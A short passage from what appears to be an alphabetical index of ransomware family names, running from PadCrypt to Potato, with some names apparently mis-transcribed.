PadCrypt, Panther, Paradise, Paradise .NET, Paradise B29, Paymen45, PayPalGenerator2019, PaySafeGen, PClock, PClock (Updated), PEC 2017, Pendor, Petna, PewCrypt, 
PGPSnippet. PhantomChina. Philadelphia. Phobos. PhoneNumber. Pickles. PL Ransomware, Plaaue17. Planetary Ransomware. PoisonFana. Poiie, PonvFinal. PopComTime, Potato. 
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